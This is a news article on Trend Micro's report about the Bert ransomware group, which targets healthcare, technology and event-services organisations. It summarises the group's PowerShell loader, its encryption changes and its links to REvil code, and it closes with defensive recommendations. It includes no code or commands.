Trend Micro Warns of New Ransomware Group Targeting Healthcare Orgs
A new ransomware group has recently emerged that is targeting multiple sectors, especially healthcare, technology, and event services. According to a recent report from cybersecurity firm Trend Micro, the Bert ransomware group’s first attacks were observed in the United States and Asia, although internal telemetry has identified further victims across Europe. While only limited evidence has been found, the new group, tracked by Trend Micro as Water Pombero, is thought to be Russian, or at least have links to the region, as the group downloads and executes its ransomware from a remote IP address associated with ASN 39134, which is registered in Russia.
The Bert Windows variant uses a straightforward code structure and a standard AES algorithm for encryption; however, the group is actively developing and refining the ransomware and improving and streamlining operations. For instance, the early iterations enumerated drives, dropped a ransom note in each directory, and collected valid file paths and saved them in an array, only proceeding with multi-threaded encryption after the collection phase. The latest iteration uses ConcurrentQueue and creates a DiskWorker on each drive, allowing file encryption to start as soon as files are discovered, speeding up file encryption.
It is currently unclear how initial access is gained to a victim’s systems. Once access has been gained to the victim’s network, a PowerShell script is used to escalate privileges, disable Windows Defender and the firewall, and user account control (UAC). The script then downloads the ransomware payload from a remote IP address and executes the payload. PowerShell is extensively used by ransomware groups for post-compromise activities as it is easy to evade detection. Trend Micro has also identified a Linux sample, which uses 50 threads to maximize encryption speed, reducing the risk of detection or interruption. Some code overlaps have been identified with the ESXi locker used by the REvil ransomware group, which ceased operations in 2021.
“New ransomware groups will likely continue to emerge, repurposing familiar tools and code, while refining TTPs,” explained Trend Micro. “As the BERT ransomware group demonstrates, simple tools can lead to successful infections. This highlights how emerging groups do not need complex techniques to be effective—just a reliable path to their goal, from intrusion, exfiltration and ultimately leverage over victim.”
Get The FREE
HIPAA Compliance Checklist
Immediate Delivery of Checklist Link To Your Email Address
Please Enter Correct Email Address
Your Privacy Respected
HIPAA Journal Privacy Policy
Since the initial access vector has yet to be identified, the best defense is to use proven security best practices, user education about email and web safety, sandboxing to analyze files before execution, prompt patching, strengthening endpoint protection, restricting admin rights, segmenting networks, and regularly backing up data and storing backups offline. Trend Micro also recommends closely monitoring for PowerShell abuse and unauthorized script execution, especially for loaders such as start.ps1 that disable security tools and escalate privileges. Full TTPs and other recommendations are detailed in the Bert ransomware report.
